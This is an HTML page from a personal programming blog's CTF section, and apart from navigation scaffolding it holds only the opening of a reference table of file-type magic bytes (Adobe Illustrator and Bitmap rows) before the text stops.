<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js coal">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>CTF Note - Andrew&#x27;s Blog</title>


        <!-- Custom HTML head -->
        
        <meta name="description" content="Andrew Ryan&#x27;s Blog">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="icon" href="../../favicon.svg">
        <link rel="shortcut icon" href="../../favicon.png">
        <link rel="stylesheet" href="../../css/variables.css">
        <link rel="stylesheet" href="../../css/general.css">
        <link rel="stylesheet" href="../../css/chrome.css">

        <!-- Fonts -->
        <link rel="stylesheet" href="../../FontAwesome/css/font-awesome.css">
        <link rel="stylesheet" href="../../fonts/fonts.css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="../../highlight.css">
        <link rel="stylesheet" href="../../tomorrow-night.css">
        <link rel="stylesheet" href="../../ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        <link rel="stylesheet" href="../../src/style/custom.css">

        <!-- MathJax -->
        <script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    </head>
    <body>
    <div id="body-container">
        <!-- Provide site root to javascript -->
        <script>
            var path_to_root = "../../";
            var default_theme = window.matchMedia("(prefers-color-scheme: dark)").matches ? "coal" : "coal";
        </script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script>
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script>
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { }
            if (theme === null || theme === undefined) { theme = default_theme; }
            var html = document.querySelector('html');
            html.classList.remove('no-js')
            html.classList.remove('coal')
            html.classList.add(theme);
            html.classList.add('js');
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script>
            var html = document.querySelector('html');
            var sidebar = null;
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            } else {
                sidebar = 'hidden';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <div class="sidebar-scrollbox">
                <ol class="chapter"><li class="chapter-item affix "><a href="../../index.html">Andrew's Blog</a></li><li class="chapter-item "><a href="../../posts/linux/linux.html"><strong aria-hidden="true">1.</strong> Linux</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/linux/install_linux.html"><strong aria-hidden="true">1.1.</strong> install linux</a></li><li class="chapter-item "><a href="../../posts/linux/bash_profile.html"><strong aria-hidden="true">1.2.</strong> bash profile</a></li><li class="chapter-item "><a href="../../posts/linux/command_list.html"><strong aria-hidden="true">1.3.</strong> command list</a></li><li class="chapter-item "><a href="../../posts/linux/git_guide.html"><strong aria-hidden="true">1.4.</strong> git guide</a></li><li class="chapter-item "><a href="../../posts/linux/tar.html"><strong aria-hidden="true">1.5.</strong> tar</a></li><li class="chapter-item "><a href="../../posts/Linux/git_cheatsheet.html"><strong aria-hidden="true">1.6.</strong> Git Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/Linux/bash_cheatsheet.html"><strong aria-hidden="true">1.7.</strong> Bash Cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/macos/mac.html"><strong aria-hidden="true">2.</strong> MacOS</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/macos/macos_profiles.html"><strong aria-hidden="true">2.1.</strong> macos profiles</a></li><li class="chapter-item "><a href="../../posts/macos/macos_pwn_env_setup.html"><strong aria-hidden="true">2.2.</strong> macos pwn env setup</a></li></ol></li><li class="chapter-item "><a href="../../posts/swift/swift.html"><strong aria-hidden="true">3.</strong> Swift</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/swift/learn_swift.html"><strong aria-hidden="true">3.1.</strong> learn swift basics</a></li><li class="chapter-item "><a href="../../posts/swift/swift_extensions.html"><strong aria-hidden="true">3.2.</strong> Swift extensions</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_extension.html"><strong aria-hidden="true">3.3.</strong> SwiftUI extensions</a></li><li class="chapter-item "><a href="../../posts/swift/install_swift.html"><strong aria-hidden="true">3.4.</strong> install swift</a></li><li class="chapter-item "><a href="../../posts/swift/task_planner.html"><strong aria-hidden="true">3.5.</strong> implment task panner app with SwiftUI</a></li><li class="chapter-item "><a href="../../posts/swift/swift_cheat_sheet.html"><strong aria-hidden="true">3.6.</strong> Swift Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/swift/yinci_url.html"><strong aria-hidden="true">3.7.</strong> Personal privacy protocol</a></li><li class="chapter-item "><a href="../../posts/swift/swift_regular_exressions.html"><strong aria-hidden="true">3.8.</strong> Swift regular exressions</a></li><li class="chapter-item "><a href="../../posts/ios/how_to_create_beautiful_ios_charts_in_swift.html"><strong aria-hidden="true">3.9.</strong> How to Create Beautiful iOS Charts in Swift</a></li><li class="chapter-item "><a href="../../posts/swift/swiftui_source_code.html"><strong aria-hidden="true">3.10.</strong> SwiftUI source code</a></li><li class="chapter-item "><a href="../../posts/swift/use_swift_fetch_iciba_api.html"><strong aria-hidden="true">3.11.</strong> use swift fetch iciba API</a></li></ol></li><li class="chapter-item "><a href="../../posts/ios/ios.html"><strong aria-hidden="true">4.</strong> iOS</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ios/cocaposd_setup_and_install_for_ios_project.html"><strong aria-hidden="true">4.1.</strong> cocaposd setup and install for ios project</a></li><li class="chapter-item "><a href="../../posts/ios/swiftui_show_gif_image.html"><strong aria-hidden="true">4.2.</strong> SwiftUI show gif image</a></li><li class="chapter-item "><a href="../../posts/ios/implement_task_planner_app.html"><strong aria-hidden="true">4.3.</strong> implement Task planner App</a></li></ol></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c.html"><strong aria-hidden="true">5.</strong> Objective-C</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/objective_c/objective_c_cheat_sheet.html"><strong aria-hidden="true">5.1.</strong> Objective-C Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/objective_c/objective_c_for_absolute_beginners_read_note.html"><strong aria-hidden="true">5.2.</strong> Objective-C Note</a></li></ol></li><li class="chapter-item "><a href="../../posts/dart/dart.html"><strong aria-hidden="true">6.</strong> Dart</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/dart/flutter.html"><strong aria-hidden="true">6.1.</strong> Flutter Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/dart/dart_cheat_sheet.html"><strong aria-hidden="true">6.2.</strong> Dart Cheat Sheet</a></li><li class="chapter-item "><a href="../../posts/flutter/flutter_dev_test.html"><strong aria-hidden="true">6.3.</strong> Flutter dev test</a></li></ol></li><li class="chapter-item "><a href="../../posts/rust/rust.html"><strong aria-hidden="true">7.</strong> Rust</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/rust/offline_use_rust.html"><strong aria-hidden="true">7.1.</strong> Offline use rust</a></li><li class="chapter-item "><a href="../../posts/rust/rust_grammer.html"><strong aria-hidden="true">7.2.</strong> rust grammar</a></li><li class="chapter-item "><a href="../../posts/rust/pase_string_and_decimal_conversion.html"><strong aria-hidden="true">7.3.</strong> pase string and decimal conversion</a></li><li class="chapter-item "><a href="../../posts/rust/parse_types.html"><strong aria-hidden="true">7.4.</strong> rust types</a></li><li class="chapter-item "><a href="../../posts/rust/rust_life_cycle.html"><strong aria-hidden="true">7.5.</strong> Rust life cycle</a></li><li class="chapter-item "><a href="../../posts/rust/rust_generic.html"><strong aria-hidden="true">7.6.</strong> rust generics</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implment_matrix.html"><strong aria-hidden="true">7.7.</strong> Rust implement matrix</a></li><li class="chapter-item "><a href="../../posts/rust/rust_sort.html"><strong aria-hidden="true">7.8.</strong> Rust implement sort algorithms</a></li><li class="chapter-item "><a href="../../posts/rust/implement_aes_encryption.html"><strong aria-hidden="true">7.9.</strong> Rust implement AEC encryption and decryption</a></li><li class="chapter-item "><a href="../../posts/rust/implement_trie_data_structure.html"><strong aria-hidden="true">7.10.</strong> implement trie data structure</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_tree.html"><strong aria-hidden="true">7.11.</strong> implement tree data_structure</a></li><li class="chapter-item "><a href="../../posts/rust/list_dir.html"><strong aria-hidden="true">7.12.</strong> list dir</a></li><li class="chapter-item "><a href="../../posts/rust/fast_way_to_implment_object_trait.html"><strong aria-hidden="true">7.13.</strong> fast way to implment object trait</a></li><li class="chapter-item "><a href="../../posts/rust/compress_rust_binary_size.html"><strong aria-hidden="true">7.14.</strong> compress rust binary size</a></li><li class="chapter-item "><a href="../../posts/rust/implment_file_upload_backend.html"><strong aria-hidden="true">7.15.</strong> impliment file upload</a></li><li class="chapter-item "><a href="../../posts/rust/this_is_add_post_cli_implementation_in_rust.html"><strong aria-hidden="true">7.16.</strong> this is add_post cli implementation in rust</a></li><li class="chapter-item "><a href="../../posts/rust/use_rust_implment_a_copyclipbord_cli.html"><strong aria-hidden="true">7.17.</strong> Use rust implment a copyclipbord CLI</a></li><li class="chapter-item "><a href="../../posts/rust/sqlite_database_add_delete_update_show_in_rust.html"><strong aria-hidden="true">7.18.</strong> sqlite database add delete update show in rust</a></li><li class="chapter-item "><a href="../../posts/rust/implementing_tokio_joinhandle_for_wasm.html"><strong aria-hidden="true">7.19.</strong> Implementing tokio JoinHandle for wasm</a></li><li class="chapter-item "><a href="../../posts/rust/rust_implement_a_crate_for_encode_and_decode_brainfuck_and_ook.html"><strong aria-hidden="true">7.20.</strong> rust implement a crate for encode and decode brainfuck and ook</a></li><li class="chapter-item "><a href="../../posts/rust/slint_builtin_elements.html"><strong aria-hidden="true">7.21.</strong> Slint Builtin Elements</a></li><li class="chapter-item "><a href="../../posts/rust/corporate_network_install_rust_on_windows.html"><strong aria-hidden="true">7.22.</strong> Corporate network install Rust on windows</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_file_how_to_judge_static_link_or_dynamic_link_in_macos.html"><strong aria-hidden="true">7.23.</strong> rust binary file how to judge static link or dynamic link in Macos</a></li><li class="chapter-item "><a href="../../posts/rust/rust_binary_include_dir_and_get_contents.html"><strong aria-hidden="true">7.24.</strong> rust binary include dir and get contents</a></li><li class="chapter-item "><a href="../../posts/rust/how_to_create_yolov8_based_object_detection_web_service_using_python,_julia,_node.js,_javascript,_go_and_rust.html"><strong aria-hidden="true">7.25.</strong> How to create YOLOv8-based object detection web service using Python, Julia, Node.js, JavaScript, Go and Rust</a></li><li class="chapter-item "><a href="../../posts/rust/implment_builder_proc_macro_for_command_struct.html"><strong aria-hidden="true">7.26.</strong> implment Builder proc-macro for Command struct</a></li></ol></li><li class="chapter-item "><a href="../../posts/java/java.html"><strong aria-hidden="true">8.</strong> Java</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/java/java_grammar.html"><strong aria-hidden="true">8.1.</strong> java grammar and codewar</a></li><li class="chapter-item "><a href="../../posts/java/run_jar.html"><strong aria-hidden="true">8.2.</strong> java run .jar</a></li><li class="chapter-item "><a href="../../posts/java/java_pomxml_add_defaultgoal_to_build.html"><strong aria-hidden="true">8.3.</strong> Java pomxml add defaultGoal to build</a></li><li class="chapter-item "><a href="../../posts/java/java_set_mvn_mirror.html"><strong aria-hidden="true">8.4.</strong> Java set mvn mirror</a></li></ol></li><li class="chapter-item "><a href="../../posts/python/python.html"><strong aria-hidden="true">9.</strong> Python</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/python/convert_pesn.html"><strong aria-hidden="true">9.1.</strong> convert pesn</a></li><li class="chapter-item "><a href="../../posts/python/find_remove_dir.html"><strong aria-hidden="true">9.2.</strong> find and remove dir</a></li><li class="chapter-item "><a href="../../posts/python/timing_message.html"><strong aria-hidden="true">9.3.</strong> wechat send message</a></li><li class="chapter-item "><a href="../../posts/python/use_python_openpyxl_package_read_and_edit_excel_files.html"><strong aria-hidden="true">9.4.</strong> Use python openpyxl package read and edit excel files</a></li><li class="chapter-item "><a href="../../posts/python/sanctum_model_yaml.html"><strong aria-hidden="true">9.5.</strong> sanctum model yaml</a></li><li class="chapter-item "><a href="../../posts/python/how_to_detect_objects_on_images_using_the_yolov8_neural_network.html"><strong aria-hidden="true">9.6.</strong> How to detect objects on images using the YOLOv8 neural network</a></li><li class="chapter-item "><a href="../../posts/python/use_huggingface_model.html"><strong aria-hidden="true">9.7.</strong> use huggingface model</a></li></ol></li><li class="chapter-item "><a href="../../posts/go/go.html"><strong aria-hidden="true">10.</strong> Go</a></li><li class="chapter-item "><a href="../../posts/javascript/js.html"><strong aria-hidden="true">11.</strong> Javascript</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/javascript/js_tutorial.html"><strong aria-hidden="true">11.1.</strong> js tutorial</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_map.html"><strong aria-hidden="true">11.2.</strong> ja map</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_math.html"><strong aria-hidden="true">11.3.</strong> js math</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_object.html"><strong aria-hidden="true">11.4.</strong> js object</a></li><li class="chapter-item "><a href="../../posts/javascript/js_tutorial_set.html"><strong aria-hidden="true">11.5.</strong> js set</a></li><li class="chapter-item "><a href="../../posts/javascript/single_thread_and_asynchronous.html"><strong aria-hidden="true">11.6.</strong> single thread and asynchronous</a></li><li class="chapter-item "><a href="../../posts/javascript/this.html"><strong aria-hidden="true">11.7.</strong> js this</a></li><li class="chapter-item "><a href="../../posts/javascript/js_implment_aes.html"><strong aria-hidden="true">11.8.</strong> js implment aes</a></li><li class="chapter-item "><a href="../../posts/javascript/getting_started_with_ajax.html"><strong aria-hidden="true">11.9.</strong> getting started with ajax</a></li><li class="chapter-item "><a href="../../posts/javascript/BinarySearchTree.html"><strong aria-hidden="true">11.10.</strong> binary search tree</a></li><li class="chapter-item "><a href="../../posts/javascript/goole_zx.html"><strong aria-hidden="true">11.11.</strong> goole zx</a></li><li class="chapter-item "><a href="../../posts/javascript/es6.html"><strong aria-hidden="true">11.12.</strong> es6</a></li></ol></li><li class="chapter-item "><a href="../../posts/ruby/ruby.html"><strong aria-hidden="true">12.</strong> Ruby</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/ruby/rails_setup_env.html"><strong aria-hidden="true">12.1.</strong> ruby on rails setup environment</a></li><li class="chapter-item "><a href="../../posts/ruby/learn_ruby.html"><strong aria-hidden="true">12.2.</strong> learn ruby</a></li><li class="chapter-item "><a href="../../posts/ruby/ruby_note.html"><strong aria-hidden="true">12.3.</strong> Ruby Note</a></li><li class="chapter-item "><a href="../../posts/ruby/setup_ruby_for_ctf.html"><strong aria-hidden="true">12.4.</strong> Setup ruby for CTF</a></li></ol></li><li class="chapter-item "><a href="../../posts/react/react.html"><strong aria-hidden="true">13.</strong> React</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/react/react_life_cycle.html"><strong aria-hidden="true">13.1.</strong> react life cycle</a></li><li class="chapter-item "><a href="../../posts/react/react_router.html"><strong aria-hidden="true">13.2.</strong> react router</a></li><li class="chapter-item "><a href="../../posts/react/react_this.html"><strong aria-hidden="true">13.3.</strong> react this</a></li><li class="chapter-item "><a href="../../posts/react/react_interviw.html"><strong aria-hidden="true">13.4.</strong> react interview</a></li><li class="chapter-item "><a href="../../posts/react/important_react_interview.html"><strong aria-hidden="true">13.5.</strong> important react interview</a></li><li class="chapter-item "><a href="../../posts/react/react_quick_reference.html"><strong aria-hidden="true">13.6.</strong> react quick reference</a></li><li class="chapter-item "><a href="../../posts/react/redux_quick_reference.html"><strong aria-hidden="true">13.7.</strong> redux quick reference</a></li></ol></li><li class="chapter-item "><a href="../../posts/vue/vue.html"><strong aria-hidden="true">14.</strong> Vue</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/vue/vue_ajax.html"><strong aria-hidden="true">14.1.</strong> vue ajax</a></li></ol></li><li class="chapter-item "><a href="../../posts/angular/angular.html"><strong aria-hidden="true">15.</strong> Angular</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/angular/controller_communication.html"><strong aria-hidden="true">15.1.</strong> controller communication</a></li><li class="chapter-item "><a href="../../posts/angular/creating_custom_directives.html"><strong aria-hidden="true">15.2.</strong> creating custom directives</a></li><li class="chapter-item "><a href="../../posts/angular/directive_notes.html"><strong aria-hidden="true">15.3.</strong> directive notes</a></li><li class="chapter-item "><a href="../../posts/angular/directive_communication.html"><strong aria-hidden="true">15.4.</strong> directive communication</a></li><li class="chapter-item "><a href="../../posts/angular/post_params.html"><strong aria-hidden="true">15.5.</strong> post params</a></li><li class="chapter-item "><a href="../../posts/angular/read_json_angular.html"><strong aria-hidden="true">15.6.</strong> read json angular</a></li><li class="chapter-item "><a href="../../posts/angular/same_route_reload.html"><strong aria-hidden="true">15.7.</strong> same route reload</a></li></ol></li><li class="chapter-item "><a href="../../posts/css/css.html"><strong aria-hidden="true">16.</strong> Css</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/css/use_css_media.html"><strong aria-hidden="true">16.1.</strong> use css media</a></li></ol></li><li class="chapter-item "><a href="../../posts/php/php.html"><strong aria-hidden="true">17.</strong> Php</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/php/for_php_string_implment_some_extemtion_functions.html"><strong aria-hidden="true">17.1.</strong> for php string implment some extemtion functions</a></li><li class="chapter-item "><a href="../../posts/php/php_cheatsheet.html"><strong aria-hidden="true">17.2.</strong> PHP cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/windows/windows.html"><strong aria-hidden="true">18.</strong> Windows</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/windows/windows.html"><strong aria-hidden="true">18.1.</strong> Windows</a></li><li class="chapter-item "><a href="../../posts/windows/windows10_use_powershell_dedup_redundent_path.html"><strong aria-hidden="true">18.2.</strong> Windows10 use PowerShell dedup redundent PATH</a></li></ol></li><li class="chapter-item "><a href="../../posts/leetcode/leetcode.html"><strong aria-hidden="true">19.</strong> Leetcode</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/leetcode/rust_leetcode.html"><strong aria-hidden="true">19.1.</strong> rust leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_codewar.html"><strong aria-hidden="true">19.2.</strong> rust codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/swift_codewar.html"><strong aria-hidden="true">19.3.</strong> swift codewar</a></li><li class="chapter-item "><a href="../../posts/leetcode/js_leetcode.html"><strong aria-hidden="true">19.4.</strong> js leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/java_leetcode.html"><strong aria-hidden="true">19.5.</strong> java leetcode</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_huawei.html"><strong aria-hidden="true">19.6.</strong> huawei test</a></li><li class="chapter-item "><a href="../../posts/leetcode/rust_utils.html"><strong aria-hidden="true">19.7.</strong> rust common functions</a></li><li class="chapter-item "><a href="../../posts/leetcode/olympiad_training.html"><strong aria-hidden="true">19.8.</strong> Computer olympiad training</a></li></ol></li><li class="chapter-item expanded "><a href="../../posts/ctf/CTF.html"><strong aria-hidden="true">20.</strong> CTF</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item expanded "><a href="../../posts/ctf/CTF_Note.html" class="active"><strong aria-hidden="true">20.1.</strong> CTF Note</a></li><li class="chapter-item "><a href="../../posts/ctf/0.1_Web.html"><strong aria-hidden="true">20.2.</strong> Web</a></li><li class="chapter-item "><a href="../../posts/ctf/4.1_Misc.html"><strong aria-hidden="true">20.3.</strong> Misc</a></li><li class="chapter-item "><a href="../../posts/ctf/3.2_PWN_note.html"><strong aria-hidden="true">20.4.</strong> PWN</a></li><li class="chapter-item "><a href="../../posts/ctf/3.1_Crypto.html"><strong aria-hidden="true">20.5.</strong> Crypto</a></li><li class="chapter-item "><a href="../../posts/ctf/3.4_RSA_note.html"><strong aria-hidden="true">20.6.</strong> Rsa attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.5_Base64.html"><strong aria-hidden="true">20.7.</strong> Base64</a></li><li class="chapter-item "><a href="../../posts/ctf/0.0_SQL Injection Cheatsheet.html"><strong aria-hidden="true">20.8.</strong> SQL Injection Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/1.1_SQL_injection.html"><strong aria-hidden="true">20.9.</strong> SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.2_SQL_injection_UNION_attacks.html"><strong aria-hidden="true">20.10.</strong> SQL Injection UNION attacks</a></li><li class="chapter-item "><a href="../../posts/ctf/1.3_Blind SQL injection.html"><strong aria-hidden="true">20.11.</strong> Blind SQL Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.4_Code Injection.html"><strong aria-hidden="true">20.12.</strong> Code Injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.5_SSRF.html"><strong aria-hidden="true">20.13.</strong> SSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.6_OS command injection.html"><strong aria-hidden="true">20.14.</strong> OS command injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.7_Local file inclusion.html"><strong aria-hidden="true">20.15.</strong> Local file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.8_Remote file inclusion.html"><strong aria-hidden="true">20.16.</strong> Remote file inclusion</a></li><li class="chapter-item "><a href="../../posts/ctf/1.9_CSRFm.html"><strong aria-hidden="true">20.17.</strong> CSRF</a></li><li class="chapter-item "><a href="../../posts/ctf/1.10_NoSQL injection.html"><strong aria-hidden="true">20.18.</strong> NoSQL injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.11_JSON injection.html"><strong aria-hidden="true">20.19.</strong> JSON injection</a></li><li class="chapter-item "><a href="../../posts/ctf/1.12_CTF_Web_SQL_Note.html"><strong aria-hidden="true">20.20.</strong> CTF Web SQL Note</a></li><li class="chapter-item "><a href="../../posts/ctf/2.1_XXE.html"><strong aria-hidden="true">20.21.</strong> XXE</a></li><li class="chapter-item "><a href="../../posts/ctf/2.2_XSS.html"><strong aria-hidden="true">20.22.</strong> XSS</a></li><li class="chapter-item "><a href="../../posts/ctf/2.3_Upload File.html"><strong aria-hidden="true">20.23.</strong> Upload File</a></li><li class="chapter-item "><a href="../../posts/ctf/2.4_serialize_unserialize.html"><strong aria-hidden="true">20.24.</strong> serialize unserialize</a></li><li class="chapter-item "><a href="../../posts/ctf/2.5_Race condition.html"><strong aria-hidden="true">20.25.</strong> Race condition</a></li><li class="chapter-item "><a href="../../posts/ctf/zip_plain_text_attack.html"><strong aria-hidden="true">20.26.</strong> Zip plain text attack</a></li><li class="chapter-item "><a href="../../posts/ctf/3.3_pwn HCTF2016 brop.html"><strong aria-hidden="true">20.27.</strong> pwn HCTF2016 brop</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_patch_defense_skill.html"><strong aria-hidden="true">20.28.</strong> PWN Patch defense skill</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_stack_overflow.html"><strong aria-hidden="true">20.29.</strong> PWN stack overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_heap_overflow.html"><strong aria-hidden="true">20.30.</strong> PWN heap overflow</a></li><li class="chapter-item "><a href="../../posts/ctf/pwn_format_string_vulnerability.html"><strong aria-hidden="true">20.31.</strong> PWN Format String Vulnerability</a></li><li class="chapter-item "><a href="../../posts/ctf/kali_linux_tutorials.html"><strong aria-hidden="true">20.32.</strong> Kali linux tutorials</a></li><li class="chapter-item "><a href="../../posts/ctf/google_dorks_2023_lists.html"><strong aria-hidden="true">20.33.</strong> Google Dorks 2023 Lists</a></li><li class="chapter-item "><a href="../../posts/ctf/dvwa_writeup.html"><strong aria-hidden="true">20.34.</strong> DVWA WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/bwapp_writeup.html"><strong aria-hidden="true">20.35.</strong> bWAPP WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/sqlilabs_writeup.html"><strong aria-hidden="true">20.36.</strong> sqlilabs WriteUp</a></li><li class="chapter-item "><a href="../../posts/ctf/pwnable_kr_challenge.html"><strong aria-hidden="true">20.37.</strong> Solutions for pwnable.kr</a></li><li class="chapter-item "><a href="../../posts/ctf/the_periodic_table.html"><strong aria-hidden="true">20.38.</strong> The Periodic Table</a></li><li class="chapter-item "><a href="../../posts/ctf/pwntools_cheatsheet.html"><strong aria-hidden="true">20.39.</strong> Pwntools Cheatsheet</a></li><li class="chapter-item "><a href="../../posts/ctf/gdb_cheatsheet.html"><strong aria-hidden="true">20.40.</strong> GDB Cheatsheet</a></li></ol></li><li class="chapter-item "><a href="../../posts/iltes/iltes.html"><strong aria-hidden="true">21.</strong> ILTES</a><a class="toggle"><div>❱</div></a></li><li><ol class="section"><li class="chapter-item "><a href="../../posts/iltes/iltes_writing.html"><strong aria-hidden="true">21.1.</strong> ILTES Writing</a></li></ol></li></ol>
            </div>
            <div id="sidebar-resize-handle" class="sidebar-resize-handle"></div>
        </nav>

        <!-- Track and set sidebar scroll position -->
        <script>
            var sidebarScrollbox = document.querySelector('#sidebar .sidebar-scrollbox');
            sidebarScrollbox.addEventListener('click', function(e) {
                if (e.target.tagName === 'A') {
                    sessionStorage.setItem('sidebar-scroll', sidebarScrollbox.scrollTop);
                }
            }, { passive: true });
            var sidebarScrollTop = sessionStorage.getItem('sidebar-scroll');
            sessionStorage.removeItem('sidebar-scroll');
            if (sidebarScrollTop) {
                // preserve sidebar scroll position when navigating via links within sidebar
                sidebarScrollbox.scrollTop = sidebarScrollTop;
            } else {
                // scroll sidebar to current active section when navigating via "next/previous chapter" buttons
                var activeSection = document.querySelector('#sidebar .active');
                if (activeSection) {
                    activeSection.scrollIntoView({ block: 'center' });
                }
            }
        </script>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                                <div id="menu-bar-hover-placeholder"></div>
                <div id="menu-bar" class="menu-bar sticky">
                    <div class="left-buttons">
                        <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                            <i class="fa fa-bars"></i>
                        </button>
                        <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                            <i class="fa fa-paint-brush"></i>
                        </button>
                        <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                            <li role="none"><button role="menuitem" class="theme" id="light">Light</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                            <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                        </ul>
                        <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                            <i class="fa fa-search"></i>
                        </button>
                    </div>

                    <h1 class="menu-title">Andrew&#x27;s Blog</h1>

                    <div class="right-buttons">
                        <a href="https://gitee.com/dnrops/dnrops" title="Git repository" aria-label="Git repository">
                            <i id="git-repository-button" class="fa fa-github"></i>
                        </a>

                    </div>
                </div>

                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script>
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <h1 id="ctf-note"><a class="header" href="#ctf-note">CTF Note</a></h1>
<h2 id="常见文件头部-magic-bytes"><a class="header" href="#常见文件头部-magic-bytes">常见文件头部 Magic Bytes</a></h2>
<div class="table-wrapper"><table><thead><tr><th>描述</th><th>扩展名</th><th>Magic Number</th></tr></thead><tbody>
<tr><td>Adobe Illustrator</td><td>.ai</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Bitmap graphic</td><td>.bmp</td><td>42 4D [BM]</td></tr>
